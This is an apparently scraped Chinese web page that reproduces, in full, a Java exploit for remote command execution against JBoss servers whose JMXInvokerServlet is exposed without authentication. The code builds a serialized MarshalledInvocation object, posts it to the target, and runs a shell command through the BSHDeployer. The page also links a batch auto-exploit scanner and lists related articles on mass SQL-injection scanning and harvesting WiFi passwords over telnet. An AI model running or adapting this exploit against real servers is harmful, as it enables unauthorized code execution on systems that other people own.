exploit-db提供出了EXP,如下:

 /*

  * JBoss JMXInvokerServlet Remote Command Execution

  * JMXInvoker.java v0.3 - Luca Carettoni @_ikki

  *

  * This code exploits a common misconfiguration in JBoss Application Server (4.x, 5.x, ...).

  * Whenever the JMX Invoker is exposed with the default configuration, a malicious "MarshalledInvocation"

  * serialized Java object allows to execute arbitrary code. This exploit works even if the "Web-Console"

  * and the "JMX Console" are protected or disabled.

  *

  * [FAQ]

  *

  * Q: Is my target vulnerable?

  * A: If http://<target>:8080/invoker/JMXInvokerServlet exists, it's likely exploitable

  *

  * Q: How to fix it?

  * A: Enable authentication in "jmx-invoker-service.xml"

  *

  * Q: Is this exploit version-dependent?

  * A: Unfortunately, yes. An hash value is used to properly invoke a method.

  *    At least comparing version 4.x and 5.x, these hashes are different.

  *

  * Q: How to compile and launch it?

  * A: javac -cp ./libs/jboss.jar:./libs/jbossall-client.jar JMXInvoker.java

  *    java  -cp .:./libs/jboss.jar:./libs/jbossall-client.jar JMXInvoker

  *    Yes, it's a Java exploit. I can already see some of you complaining....

  */

 import java.io.BufferedReader;

 import java.io.IOException;

 import java.io.InputStream;

 import java.io.InputStreamReader;

 import java.io.ObjectOutputStream;

 import java.lang.reflect.Array;

 import java.lang.reflect.Field;

 import java.lang.reflect.Method;

 import java.net.ConnectException;

 import java.net.HttpURLConnection;

 import java.net.URL;

 import javax.management.MalformedObjectNameException;

 import javax.management.ObjectName;

 import org.jboss.invocation.MarshalledInvocation; //within jboss.jar (look into the original JBoss installation dir)

 public class JMXInvokerServlet {

     //---------> CHANGE ME <---------

     static final int hash = 647347722; //Weaponized against JBoss 4.0.3SP1

     static final String url = "http://127.0.0.1:8080/invoker/JMXInvokerServlet";

     static final String cmd = "touch /tmp/exectest";

     //-------------------------------

     public static void main(String[] args) throws ClassNotFoundException, NoSuchMethodException, MalformedObjectNameException {

         System.out.println("\n--[ JBoss JMXInvokerServlet Remote Command Execution ]");

         //Create a malicious Java serialized object

         MarshalledInvocation payload = new MarshalledInvocation();

         payload.setObjectName(new Integer(hash));

         //Executes the MBean invoke operation

         Class<?> c = Class.forName("javax.management.MBeanServerConnection");

         Method method = c.getDeclaredMethod("invoke", javax.management.ObjectName.class, java.lang.String.class, java.lang.Object[].class, java.lang.String[].class);

         payload.setMethod(method);

         //Define MBean's name, operation and pars

         Object myObj[] = new Object[4];

         //MBean object name

         myObj[0] = new ObjectName("jboss.deployer:service=BSHDeployer");

         //Operation name

         myObj[1] = new String("createScriptDeployment");

         //Actual parameters

         myObj[2] = new String[]{"Runtime.getRuntime().exec(\"" + cmd + "\");", "Script Name"};

         //Operation signature

         myObj[3] = new String[]{"java.lang.String", "java.lang.String"};

         payload.setArguments(myObj);

         System.out.println("\n--[*] MarshalledInvocation object created");

         //For debugging - visualize the raw object

         //System.out.println(dump(payload));

         //Serialize the object

         try {

             //Send the payload

             URL server = new URL(url);

             HttpURLConnection conn = (HttpURLConnection) server.openConnection();

             conn.setRequestMethod("POST");

             conn.setDoOutput(true);

             conn.setDoInput(true);

             conn.setUseCaches(false);

             conn.setRequestProperty("Accept", "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2");

             conn.setRequestProperty("Connection", "keep-alive");

             conn.setRequestProperty("User-Agent", "Java/1.6.0_06");

             conn.setRequestProperty("Content-Type", "application/octet-stream");

             conn.setRequestProperty("Accept-Encoding", "x-gzip,x-deflate,gzip,deflate");

             conn.setRequestProperty("ContentType", "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation");

             ObjectOutputStream wr = new ObjectOutputStream(conn.getOutputStream());

             wr.writeObject(payload);

             System.out.println("\n--[*] MarshalledInvocation object serialized");

             System.out.println("\n--[*] Sending payload...");

             wr.flush();

             wr.close();

             //Get the response

             InputStream is = conn.getInputStream();

             BufferedReader rd = new BufferedReader(new InputStreamReader(is));

             String line;

             StringBuffer response = new StringBuffer();

             while ((line = rd.readLine()) != null) {

                 response.append(line);

             }

             rd.close();

             if (response.indexOf("Script Name") != -1) {

                 System.out.println("\n--[*] \"" + cmd + "\" successfully executed");

             } else {

                 System.out.println("\n--[!] An invocation error occured...");

             }

         } catch (ConnectException cex) {

             System.out.println("\n--[!] A connection error occured...");

         } catch (IOException ex) {

             ex.printStackTrace();

         }

     }

     /*

      * Raw dump of generic Java Objects

      */

     static String dump(Object o) {

         StringBuffer buffer = new StringBuffer();

         Class oClass = o.getClass();

         if (oClass.isArray()) {

             buffer.append("[");

             for (int i = 0; i < Array.getLength(o); i++) {

                 if (i > 0) {

                     buffer.append(",\n");

                 }

                 Object value = Array.get(o, i);

                 buffer.append(value.getClass().isArray() ? dump(value) : value);

             }

             buffer.append("]");

         } else {

             buffer.append("{");

             while (oClass != null) {

                 Field[] fields = oClass.getDeclaredFields();

                 for (int i = 0; i

                         < fields.length; i++) {

                     if (buffer.length() > 1) {

                         buffer.append(",\n");

                     }

                     fields[i].setAccessible(true);

                     buffer.append(fields[i].getName());

                     buffer.append("=");

                     try {

                         Object value = fields[i].get(o);

                         if (value != null) {

                             buffer.append(value.getClass().isArray() ? dump(value) : value);

                         }

                     } catch (IllegalAccessException e) {

                     }

                 }

                 oClass = oClass.getSuperclass();

             }

             buffer.append("}");

         }

         return buffer.toString();

     }

 }

批量扫描az0ne在github上已经有了,https://github.com/az0ne/jboss_autoexploit

JBOSS批量扫描的更多相关文章

  1. Burpsuite+sqlmap批量扫描sql漏洞

    1.burpsuite设置导出log n'd'k 输入文件名保存 2.sqlmap批量扫描     python sqlmap.py -l 文件名 --batch -smart     batch:自 ...

  2. BurpSuite导出log配合SQLMAP批量扫描注入点

    sqlmap可以批量扫描包含有request的日志文件,而request日志文件可以通过burpsuite来获取, 因此通过sqlmap结合burpsuite工具,可以更加高效的对应用程序是否存在SQ ...

  3. 批量扫描互联网无线路由设备telnet,并获取WIFI密码

    批量扫描互联网无线路由设备telnet,并获取WIFI密码 http://lcx.cc/?i=4513

  4. sqlmap批量扫描burpsuite请求日志记录

    sqlmap可以批量扫描包含有request的日志文件,而request日志文件可以通过burpsuite来获取, 因此通过sqlmap结合burpsuite工具,可以更加高效的对应用程序是否存在SQ ...

  5. BBScan — 一个信息泄漏批量扫描脚本

    github:https://github.com/lijiejie/BBScan 有些朋友手上有几十万甚至上百万个域名,比如,乌云所有厂商的子域名. 如果把这30万个域名全部扔给wvs,APPsca ...

  6. wwwscan网站目录文件批量扫描工具

    准备一个比赛样题里面给的一个扫描的工具: 不知道怎么用就上网百度了一下果然有关于这个软件的两篇介绍(感觉写的很好),第一篇介绍的应该和我的工具一样,也给了例子(现在Google不能访问了)和参数介绍, ...

  7. sqlmap批量扫描burpsuite拦截的日志记录

    1.功能上,sqlmap具备对burpsuite拦截的request日志进行批量扫描的能力 python sqlmap.py -l hermes.log --batch -v 3 --batch:会自 ...

  8. 批量扫描IP端口程序 (适用于window&linux)

    批量扫描IP端口,根据扫描IP导出IP命名的文件的结果.假设1.txt文件内容为127.0.0.1192.168.1.1然后我们获取文件内容IP进行扫描window .bat版本 :1.txt为文件名 ...

  9. 从Excel获取整列内容进行批量扫描

    实习工作原因,需要测试excel表里面ip地址是否存在漏洞,扫了一眼,呕,四五百个IP,光是挨个进行访问,都是一个浩大的工程,所以准备开始摸鱼认真工作 思路是:excel按列提取->将IP按行存 ...

随机推荐

  1. PHP笔记随笔

    1.CSS控制页面文字不能复制: body{-webkit-user-select:none;}   2.[php过滤汉字和非汉字] $sc="aaad....##--__i汉字过滤&quo ...

  2. 处理字符串中的换行,将textarea中的带有换行的字符串变为逗号分隔的写法

    _setMultipleInputValues: function (param) { //Maybe need to modify here for the new parameter //add ...

  3. sql必知必会(第四版) 学习笔记

    还有一个<Sqlserver2008技术内幕>的笔记,也很好!~ http://www.cnblogs.com/liupeng61624/p/4354983.html 温习一遍简单的sql ...

  4. php socket函数详解

    最近在用socket实现服务端向客户端主动推送消息 函数名 描述 socket_accept() 接受一个Socket连接 socket_bind() 把socket绑定在一个IP地址和端口上 soc ...

  5. Spring MVC 中请求返回之后的页面没法加载css、js等静态文件

    1.是否被拦截,这个在Web.xml配置中servlet拦截是“/”,如果是则 a.使用spring MVC 的静态资源文件 <!-- 静态文件访问,主要是针对DispatcherServlet ...

  6. 减少C++代码编译时间的方法

    c++ 的代码包含头文件和实现文件两部分, 头文件一般是提供给别人(也叫客户)使用的, 但是一旦头文件发生改变,不管多小的变化,所有引用他的文件就必须重新编译,编译就要花时间,假如你做的工程比较大(比 ...

  7. Linux是如何管理内存的

    物理内存的管理 Linux管理物理内存是使用分页机制实现的.为了使分页机制在32位和64位体系结构下高效工作,Linux采用了一个四级分页策略. Linux支持多种内存分配机制.分配物理内存页框的主要 ...

  8. 转载-python学习笔记之文件I/O

    Python 文件I/O 本章只讲述所有基本的的I/O函数,更多函数请参考Python标准文档. 打印到屏幕 最简单的输出方法是用print语句,你可以给它传递零个或多个用逗号隔开的表达式.此函数把你 ...

  9. view class source code with JAD plugin in Eclipse

    The default class viewer doesn't decompile the class file so you cannot open and check the source co ...

  10. 准确率(Precision)、召回率(Recall)以及F值(F-Measure)

    转载自:http://blog.csdn.net/yechaodechuntian/article/details/37394967 https://www.zhihu.com/question/19 ...